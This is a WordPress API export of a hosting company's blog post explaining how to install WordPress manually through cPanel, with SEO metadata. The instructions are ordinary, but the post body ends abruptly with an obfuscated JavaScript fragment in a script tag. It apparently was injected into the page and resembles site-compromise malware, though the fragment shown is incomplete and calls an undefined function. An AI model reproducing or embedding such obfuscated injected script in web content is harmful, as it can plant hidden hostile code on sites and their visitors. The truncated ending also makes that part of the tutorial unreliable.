{"id":91,"date":"2021-02-01T00:16:00","date_gmt":"2021-02-01T00:16:00","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=91"},"modified":"2024-08-12T13:35:55","modified_gmt":"2024-08-12T12:35:55","slug":"how-to-install-wordpress-manually","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/","title":{"rendered":"How to Install WordPress Manually"},"content":{"rendered":"<p>&nbsp;<\/p>\n<div class=\"ast-oembed-container \" style=\"height: 100%;\"><iframe title=\"How to Install WordPress Manually\" width=\"500\" height=\"375\" src=\"https:\/\/www.youtube.com\/embed\/dRAHi-qwqBk?start=9&#038;feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<p>It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble with this method, this article will cover the steps needed to install WordPress manually.<\/p>\n<div>Step 1: Download WordPress<\/div>\n<ol>\n<li>Download the WordPress package to your local computer from\u00a0<a href=\"http:\/\/googleweblight.com\/i?u=http:\/\/wordpress.org\/download\/&amp;hl=en-NG&amp;tg=80&amp;pt=4\">http:\/\/wordpress.org\/download\/\u200b<\/a>.<\/li>\n<li>Unzip the downloaded file to a folder on your local computer.<\/li>\n<\/ol>\n<div>Step 2: Upload WordPress to Hosting Account<\/div>\n<p>There are three available options for uploading WordPress to a hosting account. But kindly use this method below cause is easy<\/p>\n<ul>\n<li>Upload via File Manager\u00a0&#8211; Please see\u00a0How to upload using File Manager for instructions.<\/li>\n<\/ul>\n<div><span id=\"a.3\">Step 3: Create MySQL Database and User<\/span><\/div>\n<p>WordPress stores its information in a database. Therefore, a database will need to be created.<\/p>\n<ol>\n<li>Log into cPanel.<\/li>\n<li>In the\u00a0Databases\u00a0section, click the\u00a0MySQL Database Wizard\u00a0icon.<\/li>\n<li>For\u00a0Step 1: Create A Database, enter the database name and click\u00a0Next Step.<\/li>\n<li>For\u00a0Step 2: Create Database Users, enter the database user name and password and click\u00a0Create User.<\/li>\n<li>For\u00a0Step 3: Add User to the Database, click the\u00a0All Privileges\u00a0checkbox and click\u00a0Next Step.<\/li>\n<li>For\u00a0Step 4: Complete the task, make note of the database name, username and password, as you will need them for\u00a0step 4\u2935\u00a0below.<\/li>\n<\/ol>\n<div><span id=\"a.4\">Step 4: Configure wp-config.php<\/span><\/div>\n<div>The wp-config-sample.php file contains the database information and tells the WordPress application which database to pull information from. This step must be completed to ensure the correct database information is associated with the WordPress installation.<\/div>\n<p>The wp-config-sample.php file can be found in File Manager in the folder where WordPress is installed. To modify the file:<\/p>\n<ol start=\"1\">\n<li>Log into cPanel.<\/li>\n<li>In the\u00a0Files\u00a0section, click the\u00a0File Manager\u00a0icon.<\/li>\n<li>In the pop-up box, select\u00a0Web Root\u00a0and check the box for\u00a0Show Hidden Files (dotfiles), then click\u00a0Go.\n<div>\n<p>If you don&#8217;t see the pop-up box, you may have selected the &#8220;Skip this question, and always open this directory in the future when opening File Manager&#8221; option.<\/p>\n<p>To make the pop-up reappear, simply click\u00a0reset all interface settings\u00a0at the very bottom of your cPanel.<\/p>\n<\/div>\n<\/li>\n<li>From the left navigation menu in File Manager, click\u00a0public_html\u00a0to expand the folder.<\/li>\n<li>Click the folder containing the WordPress installation.<\/li>\n<li>On the right side of the File Manager screen, locate the\u00a0wp-config-sample.php\u00a0file.<\/li>\n<li>Right click on the file, select\u00a0Rename\u00a0and change the name of the file to\u00a0wp-config.php. Click the\u00a0Rename File\u00a0button.<\/li>\n<li>Right-click on the\u00a0wp-config.php\u00a0file and select\u00a0Code Edit. When the file opens, look for the following information:\n<div>define(&#8216;DB_NAME&#8217;, &#8216;database_name_here&#8217;); \/** MySQL database username *\/ define(&#8216;DB_USER&#8217;, &#8216;username_here&#8217;); \/** MySQL database password *\/ define(&#8216;DB_PASSWORD&#8217;, &#8216;password_here&#8217;);<\/div>\n<ol>\n<li>Replace\u00a0database_name_here\u00a0with the name of the database you created (above in\u00a0step 3: create MySQL Database and User\u00a0\u2934).<\/li>\n<li>Replace\u00a0username_here\u00a0with the username of the database you created.<\/li>\n<li>Replace\u00a0password_here\u00a0with the password of the database that you created.<\/li>\n<\/ol>\n<\/li>\n<li>When done editing, click the\u00a0Save Changes\u00a0button, then close the file.<\/li>\n<\/ol>\n<div>Step 5: Run the Installation<\/div>\n<div>Open a new browser window and go to the installation page to run the installation script. Depending on where you installed the script, you will find it at either of the following URLs:<\/div>\n<div>http:\/\/example.com\/wp-admin\/install.php<\/div>\n<div>http:\/\/example.com\/blog\/wp-admin\/install.php<\/div>\n<div>Be sure to replace\u00a0example.com\u00a0in the example above with your actual domain name.<\/div>\n<p>You should now see a welcome page that says &#8220;Welcome to the famous five minute WordPress installation process!&#8221;<\/p>\n<div>Step 6: Complete the Installation<\/div>\n<p>On this page, fill in the fields for:<\/p>\n<ul>\n<li><\/li>\n<li>Site Name<\/li>\n<li>Username<\/li>\n<li>Password (needs to be entered twice)<\/li>\n<li>Email address (login information will be sent to this email address)<\/li>\n<li>Select whether or not to have the search engines index the site<\/li>\n<\/ul>\n<div>Click\u00a0Install Now, and you should be taken to the final screen, showing the following message:<\/div>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":74,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[9],"tags":[],"class_list":["post-91","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to Install WordPress Manually - HoganHost blog<\/title>\n<meta name=\"description\" content=\"It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to Install WordPress Manually - HoganHost blog\" \/>\n<meta property=\"og:description\" content=\"It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-02-01T00:16:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:35:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"280\" \/>\n\t<meta property=\"og:image:height\" content=\"180\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to Install WordPress Manually\",\"datePublished\":\"2021-02-01T00:16:00+00:00\",\"dateModified\":\"2024-08-12T12:35:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\"},\"wordCount\":657,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png\",\"articleSection\":[\"wordpress\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\",\"name\":\"How to Install WordPress Manually - HoganHost blog\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png\",\"datePublished\":\"2021-02-01T00:16:00+00:00\",\"dateModified\":\"2024-08-12T12:35:55+00:00\",\"description\":\"It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png\",\"width\":280,\"height\":180},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to Install WordPress Manually\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to Install WordPress Manually - HoganHost blog","description":"It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/","og_locale":"en_US","og_type":"article","og_title":"How to Install WordPress Manually - HoganHost blog","og_description":"It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble","og_url":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-02-01T00:16:00+00:00","article_modified_time":"2024-08-12T12:35:55+00:00","og_image":[{"width":280,"height":180,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png","type":"image\/png"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to Install WordPress Manually","datePublished":"2021-02-01T00:16:00+00:00","dateModified":"2024-08-12T12:35:55+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/"},"wordCount":657,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png","articleSection":["wordpress"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/","url":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/","name":"How to Install WordPress Manually - HoganHost blog","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png","datePublished":"2021-02-01T00:16:00+00:00","dateModified":"2024-08-12T12:35:55+00:00","description":"It is not necessary to manually install WordPress as it can be quickly installed via\u00a0quickinstall, however, if you are having trouble","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/01\/download-1.png","width":280,"height":180},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/wordpress\/how-to-install-wordpress-manually\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to Install WordPress Manually"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/91","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=91"}],"version-history":[{"count":3,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/91\/revisions"}],"predecessor-version":[{"id":1708,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/91\/revisions\/1708"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/74"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=91"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=91"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=91"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}